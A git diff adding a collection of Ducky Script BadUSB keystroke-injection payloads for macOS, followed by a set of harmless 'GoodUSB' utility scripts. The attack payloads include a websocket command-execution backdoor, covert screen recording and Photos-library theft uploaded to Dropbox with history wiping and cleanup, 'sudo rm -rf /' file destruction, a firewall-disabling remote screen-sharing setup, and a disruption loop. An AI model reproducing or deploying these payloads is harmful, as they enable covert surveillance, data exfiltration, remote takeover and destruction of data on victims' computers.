path):\n async for message in websocket:\n cmd = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n cmd_output = cmd.stdout.read() + cmd.stderr.read()\n await websocket.send(cmd_output.decode())\n\nstart_server = websockets.serve(execute_command, "localhost", 8765)\n\nasyncio.get_event_loop().run_until_complete(start_server)\nasyncio.get_event_loop().run_forever()' > server.py +ENTER +DELAY 500 +STRING nohup python3 server.py > /dev/null 2>&1 & +ENTER +DELAY 500 +STRING clear +ENTER + + diff --git a/BadUSB/MacOS-narstybits/Executions/Screen Recorder MacOs to Dropbox.txt b/BadUSB/MacOS-narstybits/Executions/Screen Recorder MacOs to Dropbox.txt new file mode 100644 index 00000000..05097596 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/Screen Recorder MacOs to Dropbox.txt @@ -0,0 +1,87 @@ +REM This script records the screen and saves the recording as a .mkv file to the desktop. +REM Converts the recording to an MP4 file and saves the MP4 file to the desktop. +REM Then uploads the MP4 file to your Dropbox API, deletes the files on the desktop, and clears the terminal. + +REM Must have terminal recording privileges enabled in Privacy & Security settings +REM Script includes a delay of 10 seconds after starting the recording. +REM to allow for the desired recording duration. Can adjust the delay for longer recordings. line 35 +REM Delays for render time; if you adjust line 35, also adjust line 43 accordingly. +REM This will allow a adequate render time for the .mp4 + +REM Must have ffmpeg installed +REM You can download through the terminal using the 'brew install ffmpeg command' +REM Replace "" with system username +REM Replace "" with your API access token + + +REM Author: Narsty +REM Title: Screen Recorder MacOs to Dropbox +REM Target: MacOS +REM Version: 1.0 +REM Category: Execution + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING ffmpeg -f avfoundation -r 30 -i "1" -c:v libx264 -preset ultrafast -tune zerolatency -crf 23 -pix_fmt yuv420p ~/Desktop/screen_recording.mkv +DELAY 250 +ENTER +GUI h ; hides terminal to capture contents on the screen +DELAY 10000 ; Delay for 10 seconds (adjust as needed) +GUI TAB ; reopens terminal to continue script +DELAY 500 +CTRL C ; Send the interrupt signal to stop the recording +DELAY 500 +STRING ffmpeg -i ~/Desktop/screen_recording.mkv -c:v libx264 -preset fast -crf 23 -pix_fmt yuv420p ~/Desktop/screen_recording.mp4 +DELAY 500 +ENTER +DELAY 30000 +STRING echo 'curl -X POST "https://content.dropboxapi.com/2/files/upload" -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/screen_recording.mp4\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary "@/Users//Desktop/screen_recording.mp4"' > upload.sh +ENTER +DELAY 500 +STRING chmod +x upload.sh +ENTER +DELAY 500 +STRING nohup ./upload.sh >/dev/null 2>&1 & +DELAY 500 +ENTER +DELAY 10000 +STRING rm ~/Desktop/screen_recording.mkv +DELAY 250 +ENTER +DELAY 3000 +STRING rm ~/Desktop/screen_recording.mp4 +DELAY 250 +ENTER +DELAY 500 +STRING rm upload.sh +DELAY 500 +ENTER +DELAY 500 +STRING clear +ENTER +DELAY 500 +GUI w +DELAY 1000 +ENTER + + + + + + diff --git a/BadUSB/MacOS-narstybits/Executions/Screen Recorder MacOs.txt b/BadUSB/MacOS-narstybits/Executions/Screen Recorder MacOs.txt new file mode 100644 index 00000000..e143ea7c --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/Screen Recorder MacOs.txt @@ -0,0 +1,45 @@ +REM Description: This script records the screen and saves the recording as a video file. +REM Must have ffmpeg installed. +REM Must have terminal recording privilege enabled + +REM Script uses a screen recording command and the conversion of the recording to an MP4 file. +REM It includes a delay of 10 seconds after starting the recording to allow for the desired recording duration. Can adjust the delay for longer recordings line 31 + +REM After that, it sends the interrupt signal (Ctrl+C) to stop the recording. +REM Then it proceeds with the conversion of the recorded file from MKV to MP4 format using the ffmpeg command And stores it on the desktop + +REM you can change the locations "Desktop" to store the file in a more discrete place. + +REM Author: Narsty +REM Title: Screen Recorder MacOs +REM Target: MacOS +REM Version: 1.0 +REM Category: Execution + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 500 +STRING ffmpeg -f avfoundation -r 30 -i "1" -c:v libx264 -preset ultrafast -tune zerolatency -crf 23 -pix_fmt yuv420p ~/Desktop/screen_recording.mkv +DELAY 250 +ENTER +DELAY 10000 ; Delay for 10 seconds (adjust as needed) +CTRL C ; Send the interrupt signal to stop the recording +DELAY 500 +STRING ffmpeg -i ~/Desktop/screen_recording.mkv -c:v libx264 -preset fast -crf 23 -pix_fmt yuv420p ~/Desktop/screen_recording.mp4 +DELAY 250 +ENTER + + + + + + + + + diff --git a/BadUSB/MacOS-narstybits/Executions/System Disruption Loop.txt b/BadUSB/MacOS-narstybits/Executions/System Disruption Loop.txt new file mode 100644 index 00000000..8288ace7 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/System Disruption Loop.txt @@ -0,0 +1,34 @@ +REM This script initiates a system disruption loop by +REM continuously generating warning messages using the "say" command in macOS. +REM Will continue to run after the terminal is closed + + + +REM To end the loop you need to Kill the PID +REM Use the command +REM to find the PID +REM Run the command 'Kill PID #' to end the warning message loop. + + +REM Author: Narsty +REM Title: System Disruption Loop +REM Target: MacOS +REM Version: 1.0 +REM Category: Executions + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING nohup sh -c 'while true; do say "Warning: System compromised. Initiating disruption."; done' >/dev/null 2>&1 & +DELAY 500 +GUI k +DELAY 500 +GUI w +DELAY 500 +ENTER + diff --git a/BadUSB/MacOS-narstybits/Executions/System File Deletion.txt b/BadUSB/MacOS-narstybits/Executions/System File Deletion.txt new file mode 100644 index 00000000..ee10fbf2 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/System File Deletion.txt @@ -0,0 +1,34 @@ +REM this will delete all files on the system +REM there will be no Prompt +REM Using such scripts can have severe consequences and is not recommended. +REM Always exercise caution and ensure you have proper authorization. + + +REM Title: Fuck your Files +REM Author: NARSTY +REM Version: 1.0 +REM Target: macOS +REM Category: Executions + + +DELAY 1000 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 500 +ENTER +DELAY 1000 +STRING echo "Hello! Initiating system takeover... Deleting All Files....." +ENTER +DELAY 1000 +STRING sudo rm -rf / +ENTER +DELAY 1000 +STRING echo "All your files have been deleted. Goodbye!" +ENTER +DELAY 1000 +STRING sudo shutdown -h now +ENTER + + + diff --git a/BadUSB/MacOS-narstybits/Executions/Virtual Network Remote Access.txt b/BadUSB/MacOS-narstybits/Executions/Virtual Network Remote Access.txt new file mode 100644 index 00000000..a4cefc45 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/Virtual Network Remote Access.txt @@ -0,0 +1,52 @@ +REM VNC is a technology that allows you to remotely control another computer. +REM In this case, if the VNC server is started on a Mac, you can view +REM and control that Mac from another computer using a VNC viewer application. + + + +REM This script disables the firewall +REM disable the local address check for Screen Sharing +REM and enables screen sharing via sudo command (must know password Trying to find a workaround) + + +REM Now you can use your local computer to tap into the target +REM you can run the command open vnc://target_ip_address +REM replace "target_ip_address" with the actual I.p. of the remote MacOs + +REM VNC Viewer should establish a connection to the target machine, +REM you should be able to see and control the remote desktop of the target machine on your computer. + +REM Note that the specific command and package name may vary +REM based on the version of Homebrew and RealVNC available at the time of installation. + + +REM Author: Narsty +REM Title: Virtual Network Remote Access +REM Target: MacOS +REM Version: 1.0 +REM Category: Execution + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.screensharing.plist +DELAY 2000 +ENTER +DELAY 8000 +STRING /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate off +DELAY 3000 +ENTER +DELAY 500 +STRING defaults write com.apple.ScreenSharing skipLocalAddressCheck -bool true +DELAY 3000 +ENTER +DELAY 500 +STRING clear +DELAY 500 +GUI w + diff --git a/BadUSB/MacOS-narstybits/Executions/iCloud Photos to Dropbox.txt b/BadUSB/MacOS-narstybits/Executions/iCloud Photos to Dropbox.txt new file mode 100644 index 00000000..90827029 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/iCloud Photos to Dropbox.txt @@ -0,0 +1,95 @@ +REM This Script will copy the Photos library folder and send them to your dropbox API +REM Replace '' with the systems actual username +REM Replace '' with your actual Dropbox API key + + +REM Here's the breakdown, we navigate to the finder +REM use the Shift GUI G to open up the "go to folder" menu. +REM Then we search for & open the photos folder. +REM Now we can type "li" to navigate to the library folder that contains the photos +REM we copy it and navigate to a new window to paste the folder +REM Then we zip the folder and rename it "Targets_photos" and send it to the dropbox +REM Using the nohup and & to make sure the code is executed + +REM Requirements Must have at least two windows open +REM Dropbox API key and targets system username + + +REM Author: Narsty +REM Title: iCloud Photos to Dropbox +REM Version 1.0 MacOs +REM Category: Execution + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING Finder +DELAY 1000 +ENTER +DELAY 2000 +GUI-SHIFT g +DELAY 1000 +STRING /Users//Library/photos +DELAY 500 +ENTER +DELAY 1000 +STRING li +DELAY 500 +GUI c +DELAY 500 +CTRL RIGHTARROW +DELAY 1000 +GUI v +DELAY 15000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +CTRL c +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 1000 +STRING echo 'cd ~/Desktop && zip -r targets_photos.zip Libraries && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/targets_photos.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @targets_photos.zip' > upload.sh +DELAY 1000 +ENTER +DELAY 2000 +STRING chmod +x upload.sh +DELAY 500 +ENTER +DELAY 500 +STRING nohup ./upload.sh >/dev/null 2>&1 & +DELAY 500 +ENTER +DELAY 7000 +CTRL C +DELAY 500 +STRING rm -r ~/Desktop/libraries +DELAY 1000 +ENTER +DELAY 500 +STRING rm upload.sh +DELAY 500 +ENTER +DELAY 5000 +STRING rm -r ~/Desktop/targets_photos.zip +ENTER +DELAY 500 +STRING CLEAR +DELAY 500 +ENTER +DELAY 500 +GUI w +DELAY 500 +ENTER diff --git a/BadUSB/MacOS-narstybits/GoodUSB Readme.md b/BadUSB/MacOS-narstybits/GoodUSB Readme.md new file mode 100644 index 00000000..736a78b4 --- /dev/null +++ b/BadUSB/MacOS-narstybits/GoodUSB Readme.md @@ -0,0 +1,82 @@ + + + + + + + + + + + + + Coding + + + +

+

Welcome to the GOODUSB folder of Narsty's Ducky Script repository!

+ +

This folder contains Ducky Scripts that focus on providing utility and helpful functionality to your system.

+ +

What Are GOODUSB Scripts? + +
+ Coding +
+ +

+🔹GoodUSB Scripts are Ducky Scripts designed to showcase the positive potential of Ducky Scripting.

+ +🔹While Ducky Script is often associated with malicious intent due to its ability to automate actions on a computer, +it's essential to recognize that this scripting language can also be used for practical and constructive purposes.

+ +🔹The GoodUSB protocols harness the power of Ducky Scripting to enhance your system's security, privacy, and efficiency.

+ +🔹These scripts provide a range of utility functions, including network obscurity, untraceable browsing, system cleanup, and more.

+ +🔹By utilizing the GoodUSB protocols, you can take control of your system's operations and customize them to suit your needs.

+ +🔹Whether you're performing upgrades, organizing files, or simply exploring the capabilities of Ducky Scripting, the GoodUSB scripts offer a powerful toolkit at your disposal.

+ +

Tools +
+ Coding +
+ +

+
    +

    gtop: A system monitoring dashboard for the terminal. +

    htop: An interactive process viewer and system monitor. +

    vtop: A graphical activity monitor for the terminal. +

    Homebrew: a popular package manager for macOS that allows users to install, update, and manage various software packages and dependencies on their Mac computers. +

+

+ +

Automation +
+ Coding +
+ +

+🔹GOODUSB Scripts offer powerful automation capabilities, allowing you to streamline various tasks and processes on your Mac.

+ +🔹With GOODUSB Scripts, you can automate the updating of applications, software, and hardware, ensuring that your system stays up to date with the latest releases and patches.

+ +🔹You can also utilize GOODUSB Scripts to perform bulk operations such as reformatting or renaming a large number of files, saving you time and effort.

+ +🔹Additionally, GOODUSB Scripts enable you to relay useful information through various means, such as displaying messages on the screen or utilizing Mac OS functions like text-to-speech to audibly communicate important details.

+ +🔹By leveraging automation with GOODUSB Scripts, you can increase productivity, simplify complex tasks, and customize your system's behavior to better suit your needs.

+

+ +
+ Coding +
+ diff --git a/BadUSB/MacOS-narstybits/Goodusb/ Live Chart and price ticker.txt b/BadUSB/MacOS-narstybits/Goodusb/ Live Chart and price ticker.txt new file mode 100644 index 00000000..c2dd6311 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Goodusb/ Live Chart and price ticker.txt @@ -0,0 +1,21 @@ +REM This script fetches the current Bitcoin exchange rate using the "curl" command. +REM The data is retrieved from the rate.sx website. +REM You can Replace "Btc" with another popular asset of your choice + +REM Title: Live Chart and price ticker +REM Author: Narsty +REM Version: 1.0 +REM Category: GOODUSB + + +DELAY 500 +GUI SPACE +DELAY 500 +STRING TERMINAL +DELAY 1000 +ENTER +DELAY 500 +STRING curl rate.sx/btc +DELAY 500 +ENTER + diff --git a/BadUSB/MacOS-narstybits/Goodusb/All Applications at once.txt b/BadUSB/MacOS-narstybits/Goodusb/All Applications at once.txt new file mode 100644 index 00000000..37884936 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Goodusb/All Applications at once.txt @@ -0,0 +1,34 @@ +REM Opens Terminal, Safari, Xcode, Calendar, Messages, Pycharm CE +REM You can update the (" ") with whatever applications you'd like! +REM Delays may need adjusting depending on how long app takes to load. + +REM Title: All Applications at once +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: GOODUSB + + +ID 05ac:021e Apple:Keyboard +DELAY 2000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING open -a "Safari" +ENTER +DELAY 1000 +STRING open -a "Xcode" +ENTER +DELAY 5000 +STRING open -a "Calendar" +ENTER +DELAY 1000 +STRING open -a "Messages" +ENTER +DELAY 2000 +STRING open -a "Pycharm CE" +ENTER +DELAY 2000 diff --git a/BadUSB/MacOS-narstybits/Goodusb/AudioInfo.ducky.txt b/BadUSB/MacOS-narstybits/Goodusb/AudioInfo.ducky.txt new file mode 100644 index 00000000..5e355c93 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Goodusb/AudioInfo.ducky.txt @@ -0,0 +1,46 @@ +REM Provides a utility to display/Say useful information on the target system +REM The current date, time, and battery percentage + +REM Title: AudioInfo.ducky +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: GOODUSB + + +ID 05ac:021e Apple:Keyboard +DELAY 2000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 500 +STRING echo "USB Script Utility" +ENTER +DELAY 500 +STRING echo "-------------------" +ENTER +DELAY 500 +STRING echo "Current Date:" +ENTER +DELAY 500 +STRING date "+%Y-%m-%d" | say +ENTER +DELAY 500 +STRING echo "Current Time:" +ENTER +DELAY 500 +STRING date "+%H:%M:%S" | say +ENTER +DELAY 500 +STRING echo "Battery Percentage:" +ENTER +DELAY 500 +STRING ioreg -l | awk '$3~/Capacity/{c[$3]=$5}END{OFMT="%.2f%%";max=c["\"MaxCapacity\""];print(max>0?100*c["\"CurrentCapacity\""]/max:"?")}' | say +ENTER +DELAY 500 +STRING echo "-------------------" +ENTER +DELAY 2000 + diff --git a/BadUSB/MacOS-narstybits/Goodusb/ClearNotCLose.txt b/BadUSB/MacOS-narstybits/Goodusb/ClearNotCLose.txt new file mode 100644 index 00000000..4d7ece3e --- /dev/null +++ b/BadUSB/MacOS-narstybits/Goodusb/ClearNotCLose.txt @@ -0,0 +1,25 @@ +REM This Script will minimize all open windows + +REM Title: Clear Not Close +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: GOODUSB + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 500 +STRING osascript -e 'tell application "System Events" to set visible of every process whose visible is true and name is not "Finder" to false' +ENTER +DELAY 500 +GUI W + + + + + diff --git a/BadUSB/MacOS-narstybits/Goodusb/Dark Mode Toggler.txt b/BadUSB/MacOS-narstybits/Goodusb/Dark Mode Toggler.txt new file mode 100644 index 00000000..73e78c2a --- /dev/null +++ b/BadUSB/MacOS-narstybits/Goodusb/Dark Mode Toggler.txt @@ -0,0 +1,28 @@ +REM This script opens the Terminal application +REM runs commands to toggle the Dark Mode, and then closes the Terminal. + +REM Author: Narsty +REM Title: Dark Mode Toggler +REM Target: MacOS +REM Version: 1.0 +REM Category: GOODUSB + + +REM Title: Dark Mode Enabler +REM Author: Narsty + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING defaults write -g AppleInterfaceStyle Dark +ENTER +DELAY 500 +STRING killall Dock +ENTER +DELAY 1000 diff --git a/BadUSB/MacOS-narstybits/Goodusb/Desktop Organizer Plus.txt b/BadUSB/MacOS-narstybits/Goodusb/Desktop Organizer Plus.txt new file mode 100644 index 00000000..ee95be82 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Goodusb/Desktop Organizer Plus.txt @@ -0,0 +1,33 @@ +REM Organizes files on the desktop into separate folders based on their file extensions. +REM Creates "Documents", "Images", "Music", and "Video" folders +REM and moves corresponding files into them. +REM Run the script to organize the desktop effortlessly. + +REM Title: Desktop Organizer + +REM Author: Narsty +REM Version 1.0 MacOs +REM Category: GOODUSB + + +DELAY 1000 +GUI SPACE +DELAY 200 +STRING terminal +DELAY 200 +ENTER +DELAY 1000 +STRING mkdir -p ~/Desktop/Documents +DELAY 200 +ENTER +STRING mkdir -p ~/Desktop/Images +DELAY 200 +ENTER +STRING mkdir -p ~/Desktop/Music +DELAY 200 +ENTER +STRING mkdir -p ~/Desktop/Videos +DELAY 200 +ENTER +STRING find ~/Desktop -maxdepth 1 -type f -exec sh -c 'FILE="{}"; EXTENSION="${FILE##*.}"; case "$EXTENSION" in doc*|xls*|ppt*|pdf) mv "$FILE" ~/Desktop/Documents/ ;; jpg*|jpeg*|png*|gif*) mv "$FILE" ~/Desktop/Images/ ;; mp3*|wav*|flac*|aac*) mv "$FILE" ~/Desktop/Music/ ;; mp4*|mov*|avi*|mkv*) mv "$FILE" ~/Desktop/Videos/ ;; *) ;; esac' \; +DELAY 200 +ENTER diff --git a/BadUSB/MacOS-narstybits/Goodusb/Desktop Organizer.txt b/BadUSB/MacOS-narstybits/Goodusb/Desktop Organizer.txt new file mode 100644 index 00000000..a42da5aa --- /dev/null +++ b/BadUSB/MacOS-narstybits/Goodusb/Desktop Organizer.txt @@ -0,0 +1,27 @@ +REM Organizes files on the desktop into separate folders based on their file extensions. +REM Creates "Documents" and "Images" folders and moves corresponding files into them. +REM Run the script to organize the desktop effortlessly. + +REM Title: Desktop Organizer +REM Author: Narsty +REM Version 1.0 MacOs +REM Category: GOODUSB + +ID 05ac:021e Apple:Keyboard +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 500 +ENTER +DELAY 1000 +STRING cd ~/Desktop +ENTER +STRING mkdir -p Documents Images +ENTER +STRING mv *.txt *.docx *.pdf Documents/ +ENTER +STRING mv *.jpg *.png Images/ +ENTER +DELAY 5000 +STRING osascript -e 'tell application "Terminal" to close first window' +ENTER diff --git a/BadUSB/MacOS-narstybits/Goodusb/GTOP Monitoring Dashboard.txt b/BadUSB/MacOS-narstybits/Goodusb/GTOP Monitoring Dashboard.txt new file mode 100644 index 00000000..0bfed264 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Goodusb/GTOP Monitoring Dashboard.txt @@ -0,0 +1,27 @@ +REM System monitoring dashboard +REM shows CPU History, Memory and Swap History, Network History, Disk Usage, and Processes. +REM When you run this, you'll get a dynamic, colorful dashboard +REM showing your system's real-time statistics. +REM It's a practical use of the terminal's capabilities, and it's also visually impressive. + +REM Requirmetns: Homebrew and GTOP can install using command 'Brew install vtop' + +REM Title: GTOP Monitoring Dashboard +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: GOODUSB + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 1000 +ENTER +DELAY 500 +GUI-CTRL f +DELAY 1000 +STRING gtop +ENTER + diff --git a/BadUSB/MacOS-narstybits/Goodusb/Git Repository Updater.txt b/BadUSB/MacOS-narstybits/Goodusb/Git Repository Updater.txt new file mode 100644 index 00000000..4a1c9fa0 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Goodusb/Git Repository Updater.txt @@ -0,0 +1,30 @@ +REM This script auto updates your git repo. +REM Replace '/path/to/your/' with the path to your repository. +REM Replace 'repository' with the name of your repository you want to update. + +REM Title: Git Repository Updater +REM Author: Narsty +REM Version: 1.0 +REM Category: GOODUSB + + +DELAY 500 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 1000 +ENTER +DELAY 500 +STRING cd /path/to/your/repository +ENTER +DELAY 500 +STRING git add . +ENTER +DELAY 2000 +STRING git commit -am "Auto-updated repository" +ENTER +DELAY 1000 +STRING git push +ENTER +DELAY 4000 +GUI w \ No newline at end of file diff --git a/BadUSB/MacOS-narstybits/Goodusb/Gmail Address Generator.txt b/BadUSB/MacOS-narstybits/Goodusb/Gmail Address Generator.txt new file mode 100644 index 00000000..c49d1412 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Goodusb/Gmail Address Generator.txt @@ -0,0 +1,23 @@ +REM This script generates a random Gmail address and checks its availability. +REM It displays the generated email and whether it's available or not. + +REM While this method can provide a reasonable indication of email availability, it's not guaranteed to be 100% accurate. + +REM Author: Narsty +REM Title: Gmail Address Generator +REM Category: GOODUSB +REM Version: 2.0 + + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING EMAIL=$(cat /dev/urandom | LC_ALL=C tr -dc 'a-zA-Z0-9' | fold -w 10 | head -n 1)@gmail.com; clear; echo "Generated email: $EMAIL"; echo "Checking email availability..."; RESPONSE=$(curl -s "https://mail.google.com/verify?email=$EMAIL"); if [[ $RESPONSE == *"The email address you entered is not available."* ]]; then echo "Email is not available"; else echo "Email is available"; fi +DELAY 1000 +ENTER diff --git a/BadUSB/MacOS-narstybits/Goodusb/Homebrew Manager - Streamline Your macOS Package Updates.txt b/BadUSB/MacOS-narstybits/Goodusb/Homebrew Manager - Streamline Your macOS Package Updates.txt new file mode 100644 index 00000000..96c138db --- /dev/null +++ b/BadUSB/MacOS-narstybits/Goodusb/Homebrew Manager - Streamline Your macOS Package Updates.txt @@ -0,0 +1,24 @@ +REM opens the Terminal application and runs a series of commands +REM to update, upgrade, and clean up Homebrew packages. + +REM Title: Homebrew Manager +REM Author: Narsty +REM Version 1.0 MacOs +REM Category: GOODUSB + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING brew update && brew upgrade && brew cleanup && brew autoremove +DELAY 1000 +ENTER + + + + diff --git a/BadUSB/MacOS-narstybits/Goodusb/Htop Digital Dashboard.txt b/BadUSB/MacOS-narstybits/Goodusb/Htop Digital Dashboard.txt new file mode 100644 index 00000000..aea68a67 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Goodusb/Htop Digital Dashboard.txt @@ -0,0 +1,26 @@ +REM System monitoring dashboard +REM shows Memory and Swap, Task, Uptime, and Processes. +REM When you run this, you'll get a dynamic, colorful dashboard that can be fine tuned to your liking. +REM Showing your system's real-time statistics. +REM It's a practical use of the terminal's capabilities, and it's also visually impressive. + +REM Requirmetns: Homebrew and HTOP can install using command 'Brew install vtop' + +REM Title: HTOP Digital Dashboard +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: GOODUSB + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 1000 +ENTER +DELAY 500 +GUI-CTRL f +DELAY 2000 +STRING htop +ENTER diff --git a/BadUSB/MacOS-narstybits/Goodusb/MacOS ScreenShot.txt b/BadUSB/MacOS-narstybits/Goodusb/MacOS ScreenShot.txt new file mode 100644 index 00000000..faaadaef --- /dev/null +++ b/BadUSB/MacOS-narstybits/Goodusb/MacOS ScreenShot.txt @@ -0,0 +1,36 @@ +REM Takes a Screenshot and saves the image to the desktop + +REM Title: MacOS ScreenShot +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: GOODUSB + + +ID 05ac:021e Apple:Keyboard +DELAY 2000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 500 +STRING echo "USB Script Utility" +ENTER +DELAY 500 +STRING echo "-------------------" +ENTER +DELAY 500 +STRING echo "Capturing Screenshot..." +ENTER +DELAY 500 +STRING screencapture -W ~/Desktop/screenshot.png +ENTER +DELAY 1000 +STRING echo "Screenshot captured and saved to Desktop!" +ENTER +DELAY 500 +STRING echo "-------------------" +ENTER +DELAY 2000 +GUI q diff --git a/BadUSB/MacOS-narstybits/Goodusb/MacUpdaterBot+.txt b/BadUSB/MacOS-narstybits/Goodusb/MacUpdaterBot+.txt new file mode 100644 index 00000000..0e3beb8f --- /dev/null +++ b/BadUSB/MacOS-narstybits/Goodusb/MacUpdaterBot+.txt @@ -0,0 +1,26 @@ +REM Must have Homebrew (shows progress bar on updates in the terminal) +REM first install pv using Homebrew (brew install pv). + +REM Runs the software update command and pipes its output to pv. +REM The pv command will display the progress bar or bars for the updates + + +REM Author: Narsty +REM Title: MacUpdaterBot+ +REM Target: MacOS +REM Version: 1.0 +REM Category: GOODUSB + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING softwareupdate -ia --verbose 2>&1 | pv -l -s "$(softwareupdate -l | wc -l)" -p -t -i 1 +DELAY 1000 +ENTER + + diff --git a/BadUSB/MacOS-narstybits/Goodusb/MacUpdaterBot.txt b/BadUSB/MacOS-narstybits/Goodusb/MacUpdaterBot.txt new file mode 100644 index 00000000..dcd3934d --- /dev/null +++ b/BadUSB/MacOS-narstybits/Goodusb/MacUpdaterBot.txt @@ -0,0 +1,28 @@ +REM Checks for and installs available updates on the MacOs system +REM Very handy if you do not enjoy manually updating your system often! + +REM Note that running software updates with administrative privileges +REM can affect system files, so exercise caution +REM ensure that you have the necessary permissions to perform the updates. + +REM Author: Narsty +REM Title: MacUpdaterBot +REM Target: MacOS +REM Version: 1.0 +REM Category: GOODUSB + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING sudo softwareupdate -ia --verbose +DELAY 1000 +ENTER + + + diff --git a/BadUSB/MacOS-narstybits/Goodusb/Password Generator.txt b/BadUSB/MacOS-narstybits/Goodusb/Password Generator.txt new file mode 100644 index 00000000..b756fb74 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Goodusb/Password Generator.txt @@ -0,0 +1,35 @@ +REM This script automates the process of generating +REM a strong and secure password on macOS. + +REM Title: Password Generator +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: GOODUSB + + +ID 05ac:021e Apple:Keyboard +DELAY 2000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 500 +STRING echo "Generating Password..." +ENTER +DELAY 500 +STRING password=$(openssl rand -base64 12) +ENTER +DELAY 500 +STRING osascript -e 'tell app "System Events" to display dialog "Generated Password:\n\n'"$password"'" with title "Generated Password" buttons {"OK"} default button 1 with icon note' +ENTER + + + + + + + + + diff --git a/BadUSB/MacOS-narstybits/Goodusb/Quick Lock Screen.txt b/BadUSB/MacOS-narstybits/Goodusb/Quick Lock Screen.txt new file mode 100644 index 00000000..a73f9769 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Goodusb/Quick Lock Screen.txt @@ -0,0 +1,32 @@ +REM Locks the screen on macOS +REM Provides a quick way to secure your computer when stepping away +REM Ensures privacy and data protection + + +REM Title: Quick Lock Screen +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: GOODUSB + + +ID 05ac:021e Apple:Keyboard +DELAY 2000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 500 +STRING echo "Locking Screen..." +ENTER +DELAY 500 +GUI-CTRL q +ENTER +DELAY 1000 + + + + + + diff --git a/BadUSB/MacOS-narstybits/Goodusb/Toggle Wifi.txt b/BadUSB/MacOS-narstybits/Goodusb/Toggle Wifi.txt new file mode 100644 index 00000000..a79411d7 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Goodusb/Toggle Wifi.txt @@ -0,0 +1,33 